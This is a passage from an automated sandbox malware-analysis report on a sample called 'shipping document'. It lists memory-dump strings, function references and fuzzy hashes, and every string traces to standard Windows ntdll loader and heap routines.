                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017D25EB
                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017D2506
                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017D2602
                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017D2412
                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 017D261F
                                                                                                • @, xrefs: 017D259B
                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017D2624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                • API String ID: 0-4009184096
                                                                                                • Opcode ID: 0e36266b1c771147f2558b6e956e0245d348ebd7aa5588b70c3e8f82bb0a4ef5
                                                                                                • Instruction ID: b071e93fe7bef3501d38981b2e0378f66e1e679a440366991b52584e35518a1d
                                                                                                • Opcode Fuzzy Hash: 0e36266b1c771147f2558b6e956e0245d348ebd7aa5588b70c3e8f82bb0a4ef5
                                                                                                • Instruction Fuzzy Hash: 9D0270F1D04269ABDF21DB54CC84B99F7B8AF55304F4041DAE609A7242EB309E85CF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                • API String ID: 0-2515994595
                                                                                                • Opcode ID: cde76c134788409deea28f60da6d3e6826122b1be6bc78f2edda749a2c17a9b8
                                                                                                • Instruction ID: 44ddaea2652f792729d6fb9ef3c7a9c9086cf6d295bda852d6d6f8f0ed6d2f66
                                                                                                • Opcode Fuzzy Hash: cde76c134788409deea28f60da6d3e6826122b1be6bc78f2edda749a2c17a9b8
                                                                                                • Instruction Fuzzy Hash: 9351A2B19043099FD76ACF188C44BABBBE8EFD5354F144A2DE955C3281E770D684C792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                • API String ID: 0-1700792311
                                                                                                • Opcode ID: c7f6924004d20b5cd52600f4aaefa43602c9b7f6498ba8d0b20b08489e4fd455
                                                                                                • Instruction ID: 31c3b30d2bb17bb8f491412ef60274947e6fcb2b775a4c2032c9708f70a9c93a
                                                                                                • Opcode Fuzzy Hash: c7f6924004d20b5cd52600f4aaefa43602c9b7f6498ba8d0b20b08489e4fd455
                                                                                                • Instruction Fuzzy Hash: 1BD1CC72600689DFDB22DF68C854AADFBF5FF4A704F088049F845DB25AD7749A80CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017E8A67
                                                                                                • VerifierFlags, xrefs: 017E8C50
                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 017E8B8F
                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017E8A3D
                                                                                                • VerifierDlls, xrefs: 017E8CBD
                                                                                                • VerifierDebug, xrefs: 017E8CA5
                                                                                                • HandleTraces, xrefs: 017E8C8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                • API String ID: 0-3223716464
                                                                                                • Opcode ID: 3ae35f42ecd9106ab052ec209e3a42705a86f488b8a3c21321dcd86e76316da0
                                                                                                • Instruction ID: 253931d1f8f3664a76d646bb342d41c5a9d01da871b519d5de4f9ef9134e6741
                                                                                                • Opcode Fuzzy Hash: 3ae35f42ecd9106ab052ec209e3a42705a86f488b8a3c21321dcd86e76316da0
                                                                                                • Instruction Fuzzy Hash: 6E916772645702EFDB22DF28C888B1AF7E4EB5CB14F440498FA45AB254C770AE04CB93
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-792281065
                                                                                                • Opcode ID: 2bd579a9ff9a98bc9a3274521ce1c7334b1355781fdda44056d00e40a1b7d728
                                                                                                • Instruction ID: b69da3cfa53c6a53aa2e833611deaa9362956d2748de6e85fbefc36191097654
                                                                                                • Opcode Fuzzy Hash: 2bd579a9ff9a98bc9a3274521ce1c7334b1355781fdda44056d00e40a1b7d728
                                                                                                • Instruction Fuzzy Hash: 35915971B003199BEF35DF68E859BAEFBB1FB40B14F140228FA016B695D7749A01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • apphelp.dll, xrefs: 01756496
                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017B99ED
                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017B9A2A
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017B9A11, 017B9A3A
                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017B9A01
                                                                                                • LdrpInitShimEngine, xrefs: 017B99F4, 017B9A07, 017B9A30
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-204845295
                                                                                                • Opcode ID: 1705de9eaaf709b3ea44f834892055741976cc2a8bd282796180c1daebf3eeb6
                                                                                                • Instruction ID: fb5ca0cbca5581d7e87476d7474fa64c5a96dc9589a0ed1a41cd85da80cf5ef8
                                                                                                • Opcode Fuzzy Hash: 1705de9eaaf709b3ea44f834892055741976cc2a8bd282796180c1daebf3eeb6
                                                                                                • Instruction Fuzzy Hash: F951D3B12483059FD720DF24D895BABFBE4FB84748F40091DFA9597165D770EA04CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 017D2160, 017D219A, 017D21BA
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017D2180
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017D21BF
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017D2178
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017D2165
                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017D219F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                • API String ID: 0-861424205
                                                                                                • Opcode ID: 73c70a36094fca9fe3e064204744fb246a961b4ee184bda30eeb345f9ebb3bb0
                                                                                                • Instruction ID: 826349c7bf94bfe2c24e1420d59b41faa3d22d937977d4064a94067431828ffa
                                                                                                • Opcode Fuzzy Hash: 73c70a36094fca9fe3e064204744fb246a961b4ee184bda30eeb345f9ebb3bb0
                                                                                                • Instruction Fuzzy Hash: FD313576B4021977FB21AAA99C45F5EFBB8DBA5A50F054059FB04BB202D3709E01C6A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017D81E5
                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 017D8170
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0179C6C3
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 017D8181, 017D81F5
                                                                                                • LdrpInitializeImportRedirection, xrefs: 017D8177, 017D81EB
                                                                                                • LdrpInitializeProcess, xrefs: 0179C6C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-475462383
                                                                                                • Opcode ID: 33eb8513343eeeec3d130432c77e26bb7458822fc049fcbf34cb4ba14b4c7369
                                                                                                • Instruction ID: 661849fa55a503e5e0adb5345bb495e26bb0a3a779269c0acbc6d65e6b61b969
                                                                                                • Opcode Fuzzy Hash: 33eb8513343eeeec3d130432c77e26bb7458822fc049fcbf34cb4ba14b4c7369
                                                                                                • Instruction Fuzzy Hash: 7E31E4B16443469BC724EF29DC4AE1AFBE4EFD4B10F040558F9456B295E620ED08CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 017A2DF0: LdrInitializeThunk.NTDLL ref: 017A2DFA
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0BA3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0BB6
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0D60
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A0D74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 1404860816-0
                                                                                                • Opcode ID: b41b35957bb4c76e99dbdd24beae62ca179a3687996cb81f2bc46277c478e7e3
                                                                                                • Instruction ID: f3146a7843bee1ef7c1c05db066cf025155f07ecb53f8a189e82b7ab3e490074
                                                                                                • Opcode Fuzzy Hash: b41b35957bb4c76e99dbdd24beae62ca179a3687996cb81f2bc46277c478e7e3
                                                                                                • Instruction Fuzzy Hash: 01426E72900715DFDB21CF28C844BAAB7F5FF48304F5445A9EA89EB245E770AA84CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                • API String ID: 0-379654539
                                                                                                • Opcode ID: e8bd3b120f70fc45faaefa1af4ad1805c4e96d327522d2b5bfd6719ffbc03333
                                                                                                • Instruction ID: 35396c0539e3060813e456b148e66ae826f2083e84559fdf350d39d61060bd23
                                                                                                • Opcode Fuzzy Hash: e8bd3b120f70fc45faaefa1af4ad1805c4e96d327522d2b5bfd6719ffbc03333
                                                                                                • Instruction Fuzzy Hash: 04C16A741083828FD721DF58C444B6AFBE8BF94704F0449AEFD96AB252E734DA49CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • @, xrefs: 01798591
                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0179855E
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01798421
                                                                                                • LdrpInitializeProcess, xrefs: 01798422
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1918872054
                                                                                                • Opcode ID: bc38954fcd5db90002fd3039c34bbbb8c8cc0661a3678c881ec856bcb1bc4bc5
                                                                                                • Instruction ID: c216963be92c2b096dbac40c3230358b786a629d983e04e0b7d6885f59845fe1
                                                                                                • Opcode Fuzzy Hash: bc38954fcd5db90002fd3039c34bbbb8c8cc0661a3678c881ec856bcb1bc4bc5
                                                                                                • Instruction Fuzzy Hash: FA918C71508349AFDB21DF65CC44FABFBE8BF95644F80092EFA8496155E334D9088B63
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017D21D9, 017D22B1
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017D22B6
                                                                                                • .Local, xrefs: 017928D8
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017D21DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                • API String ID: 0-1239276146
                                                                                                • Opcode ID: 6fe67083a16c6bc2ac0d9380f3adf53dbef7e336c89c520de728ba5d6915a883
                                                                                                • Instruction ID: 95d8a030db26ecdd5c4cba603a8fce7a7ed4eefc16fc59fb531cfc27035adf85
                                                                                                • Opcode Fuzzy Hash: 6fe67083a16c6bc2ac0d9380f3adf53dbef7e336c89c520de728ba5d6915a883
                                                                                                • Instruction Fuzzy Hash: 72A1B231944229EBDF24DF68DC88BA9F7B1BF58314F1541E9E908AB252D7309E85CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017D342A
                                                                                                • RtlDeactivateActivationContext, xrefs: 017D3425, 017D3432, 017D3451
                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017D3456
                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017D3437
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                • API String ID: 0-1245972979
                                                                                                • Opcode ID: 3191772e8e8b0956b20116f8ca9c61b81f1b0f4709160fc2cd77c2f6a348e681
                                                                                                • Instruction ID: 6fe8eb5a896a6a3023aedf3e92355348236d404389858ed820328425964279fd
                                                                                                • Opcode Fuzzy Hash: 3191772e8e8b0956b20116f8ca9c61b81f1b0f4709160fc2cd77c2f6a348e681
                                                                                                • Instruction Fuzzy Hash: 6B6123B2600B169FDB22CF1CD981B3AF7E5EF84B50F14855DE9569B240D738E806CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017C10AE
                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017C0FE5
                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017C1028
                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017C106B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                • API String ID: 0-1468400865
                                                                                                • Opcode ID: 14a2df83f193dbdb686667305263a042e605ea83d48a9165195e7892cf2a1e18
                                                                                                • Instruction ID: 86e088c623f3259d90c473198631ef57a6096b023a6735a825141743178a3963
                                                                                                • Opcode Fuzzy Hash: 14a2df83f193dbdb686667305263a042e605ea83d48a9165195e7892cf2a1e18
                                                                                                • Instruction Fuzzy Hash: C871AFB19043469FCB21DF18C889B9BBBACAF94764F900568FD488B14BD774D588CBD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • apphelp.dll, xrefs: 01782462
                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017CA992
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017CA9A2
                                                                                                • LdrpDynamicShimModule, xrefs: 017CA998
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-176724104
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0177327D
                                                                                                • HEAP[%wZ]: , xrefs: 01773255
                                                                                                • HEAP: , xrefs: 01773264
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                • API String ID: 0-617086771
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-4253913091
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $@
                                                                                                • API String ID: 0-1077428164
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                • API String ID: 0-2779062949
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017CA121
                                                                                                • LdrpCheckModule, xrefs: 017CA117
                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 017CA10F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-161242083
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-1334570610
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017D82E8
                                                                                                • Failed to reallocate the system dirs string !, xrefs: 017D82D7
                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017D82DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1783798831
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • PreferredUILanguages, xrefs: 0181C212
                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0181C1C5
                                                                                                • @, xrefs: 0181C1F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                • API String ID: 0-2968386058
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                • API String ID: 0-1373925480
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • LdrpCheckRedirection, xrefs: 017E488F
                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017E4888
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 017E4899
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-3154609507
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
